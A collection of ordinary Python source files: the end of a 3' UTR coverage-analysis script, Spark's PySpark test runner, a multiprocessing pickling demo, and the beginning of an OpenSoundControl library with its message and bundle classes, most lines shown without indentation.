select_mean_squared_error = Mean_squared_error_list[min_ele_index]
selected_break_point = search_region[min_ele_index]
UTR_abundances = [['NA']*num_samples, ['NA']*num_samples]
UTR_abundances_passed = Estimated_3UTR_abundance_list[min_ele_index]
for k in range(len(Pass_threshold_index)):
UTR_abundances[0][Pass_threshold_index[k]] = UTR_abundances_passed[0][k]
UTR_abundances[1][Pass_threshold_index[k]] = UTR_abundances_passed[1][k]
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
return select_mean_squared_error, selected_break_point, UTR_abundances
def Estimation_abundance(Region_Coverage, break_point):
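    # Two-segment model (descriptive comment): coverage downstream of the candidate
    # break point is attributed to the long 3' UTR isoform alone (its mean is
    # Long_UTR_abun), while coverage upstream of the break point is modelled as
    # long + short isoforms, so Short_UTR_abun is the upstream mean minus
    # Long_UTR_abun (floored at 0). The returned mean squared error of the residuals
    # scores how well this break point explains the observed coverage.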
Long_UTR_abun = np.mean(Region_Coverage[break_point:])
Short_UTR_abun = np.mean(Region_Coverage[0:break_point] - Long_UTR_abun)
if Short_UTR_abun < 0:
Short_UTR_abun = 0
Coverage_diff = Region_Coverage[0:break_point] - Long_UTR_abun - Short_UTR_abun
Coverage_diff= np.append(Coverage_diff, Region_Coverage[break_point:] - Long_UTR_abun)
Mean_Squared_error = np.mean(Coverage_diff**2)
return Mean_Squared_error, Long_UTR_abun, Short_UTR_abun
def Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Wig_files,UTR_Annotation_file, num_threads,curr_processing_chr):
num_samples = len(All_Wig_files)
UTR_events_dict = {}
for line in open(UTR_Annotation_file, 'r'):
fields = line.strip('\n').split('\t')
curr_chr = fields[0]
if curr_chr == curr_processing_chr:
region_start = fields[1]
region_end = fields[2]
curr_strand = fields[-1]
UTR_pos = "%s:%s-%s" %(curr_chr, region_start, region_end)
end_shift = int(round(abs(int(region_start) - int(region_end)) * 0.2))
if curr_strand == "+":
region_end = str(int(region_end) - end_shift)
else:
region_start = str(int(region_start) + end_shift)
region_start = int(region_start) + 1
region_end = int(region_end) - 1
if region_start + 50 < region_end:
UTR_events_dict[fields[3]] = [fields[0],region_start,region_end,fields[-1],UTR_pos]
Assigned_index = Assign_to_different_processor_balance(num_samples, num_threads)
manager = multiprocessing.Manager() # create only 1 Manager
All_samples_extracted_3UTR_coverage_dict = manager.dict() # create only 1 dict
processes = []
Final_assigned_threads_num = len(Assigned_index)
for i in range(Final_assigned_threads_num):
process = multiprocessing.Process(target=load_wig_funct_shared_dict_sampleid_key, args=(All_Wig_files, Assigned_index[i], UTR_events_dict,curr_processing_chr,All_samples_extracted_3UTR_coverage_dict))
process.start()
processes.append(process)
for p in processes:
p.join()
return All_samples_extracted_3UTR_coverage_dict, UTR_events_dict
def load_wig_funct_shared_dict_sampleid_key(All_wig_files, assigned_indexes,UTR_events_dict, curr_processing_chr, All_samples_extracted_3UTR_coverage_dict):
'''
All_samples_extracted_3UTR_coverage_dict: sample id is the key.
'''
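    # Expected wiggle/bedGraph-style input (illustrative): tab-separated lines of
    # "chrom<TAB>start<TAB>end<TAB>coverage"; header lines starting with '#' or
    # 'track' are skipped below, and 'chr' is prepended to the chromosome name
    # when no_chr_prefix == "T".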
for i in assigned_indexes:
curr_wig_file = All_wig_files[i]
print >> sys.stderr, curr_wig_file
curr_sample_All_chroms_coverage_dict = {}
with open(curr_wig_file, 'r') as fin:
for line in fin:
if line[0] != '#' and line[0] != 't':
fields = line.strip('\n').split('\t')
chrom_name = (no_chr_prefix == "T")*'chr' + fields[0]
# print >> sys.stderr, chrom_name
if chrom_name == curr_processing_chr:
region_start = int(fields[1])
region_end = int(fields[2])
if chrom_name not in curr_sample_All_chroms_coverage_dict:
curr_sample_All_chroms_coverage_dict[chrom_name] = [[0],[0]]
if region_start > curr_sample_All_chroms_coverage_dict[chrom_name][0][-1]:
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_start)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(0)
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_end)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(int(float(fields[-1])))
else:
if len(curr_sample_All_chroms_coverage_dict)>0:
break
fin.close()
if curr_processing_chr not in curr_sample_All_chroms_coverage_dict:
print >> sys.stderr, 'no wig: ' + curr_wig_file
else:
curr_sample_All_chroms_coverage_dict[curr_processing_chr][1].append(0)
curr_sample_coverage_dict = {}
for curr_3UTR_event_id in UTR_events_dict:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_event_id]
curr_chr_local = curr_3UTR_structure[0]
if curr_chr_local in curr_sample_All_chroms_coverage_dict:
curr_chr_coverage = curr_sample_All_chroms_coverage_dict[curr_chr_local]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
left_region_index = bisect(curr_chr_coverage[0],region_start)
right_region_index = bisect(curr_chr_coverage[0],region_end)
extracted_coverage = curr_chr_coverage[1][left_region_index:right_region_index+1]
extracted_3UTR_region = curr_chr_coverage[0][left_region_index:right_region_index]
extracted_3UTR_region.insert(0,region_start)
extracted_3UTR_region.append(region_end)
curr_event_info = [extracted_coverage,extracted_3UTR_region]
All_samples_extracted_3UTR_coverage_dict[curr_3UTR_event_id,i] = curr_event_info
def Assign_to_different_processor_balance(Total_number, num_processors):
Assigned_results = []
num_each_processor = Total_number/num_processors
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(range((i)*(num_each_processor + 1), (i+1)*(num_each_processor + 1)))
for i in range(num_processors-remain):
Assigned_results.append(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1)))
return Assigned_results
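# Illustrative example (values assumed): Assign_to_different_processor_balance(10, 3)
# returns [[0, 1, 2, 3], [4, 5, 6], [7, 8, 9]]: the remainder left over by the integer
# division is spread one extra item at a time over the first processors.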
def Assign_to_different_processor_balance_events(All_events_ids, num_processors):
Assigned_results = []
Total_number = len(All_events_ids)
num_each_processor = Total_number/num_processors
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(range((i)*(num_each_processor+1), (i+1)*(num_each_processor+1)))
for i in range(num_processors-remain):
Assigned_results.append(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1)))
#print assigned Results
Assigned_events = []
print '#assigned events:'
for curr_processor_inds in Assigned_results:
curr_processor_events = []
print len(curr_processor_inds)
for curr_ele in curr_processor_inds:
curr_processor_events.append(All_events_ids[curr_ele])
Assigned_events.append(curr_processor_events)
return Assigned_events
#global parameters
least_pass_coverage_percentage = 0.3
De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(sys.argv)
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
if sys.version < '3':
import Queue
else:
import queue as Queue
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
def run_individual_python_test(test_name, pyspark_python):
env = dict(os.environ)
env.update({'SPARK_TESTING': '1', 'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)})
LOGGER.debug("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
per_test_output.close()
LOGGER.info("Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.6", "python3.4", "pypy"] if which(x)]
if "python2.6" not in python_execs:
LOGGER.warning("Not testing against `python2.6` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
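    # PriorityQueue pops the lowest priority value first, so the long-running suites
    # below (priority 0) are scheduled before the remaining goals (priority 100),
    # which keeps the worker threads busy for the whole run.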
for python_exec in python_execs:
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
if test_goal in ('pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests'):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
if __name__ == "__main__":
main()
|
multi-badq.py
|
### these both fail: can't put bound method on Pipe or Queue!
class Spam:
def action(self): print(99)
from multiprocessing import Process, Pipe
def sender(pipe):
pipe.send(Spam().action)
pipe.close()
if __name__ == '__main__':
(parentEnd, childEnd) = Pipe()
Process(target=sender, args=(childEnd,)).start() # spawn child with pipe
print('parent got:', parentEnd.recv()) # receive from child
print('parent exit')
"""
import os, time, queue
from multiprocessing import Process, Queue # process-safe shared queue
# queue is a pipe + locks/semas
class Counter(Process):
def __init__(self, queue): # retain state for us in run
self.post = queue
Process.__init__(self)
def run(self): # run in newprocess on start()
for i in range(3):
time.sleep(1)
self.post.put(Spam().action) # stdout file is shared by all
print('child exit')
if __name__ == '__main__':
print('start', os.getpid())
post = Queue()
p = Counter(post)
p.start()
while True: # parent consumes data on queue
time.sleep(0.5) # this is essentially like a GUI,
try: # though GUIs often use threads
data = post.get(block=False)
except queue.Empty:
print('no data...')
else:
print('posted:', data)
break
p.join()
print('finish', os.getpid(), p.exitcode) # exitcode is child exit status
"""
|
OSC3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
March 2015:
Python 3 version tested in Blender and simpleOSC with twisted
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning: an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from socketserver import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
    >>> print(msg)
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
    Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address=""):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument
"""
self.clear(address)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = b""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if isinstance(argument,dict):
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__') and not type(argument) in (str,bytes):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if isinstance(values,tuple):
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif isinstance(values,list):
items = []
for val in values:
if isinstance(val,tuple):
items.append(val[:2])
else:
items.append((typehint, val))
elif isinstance(values,tuple):
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if not isinstance(i,slice):
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
            raise ValueError("'%s' not in OSCMessage" % str(val))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
    OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
        If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if isinstance(argument,dict):
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
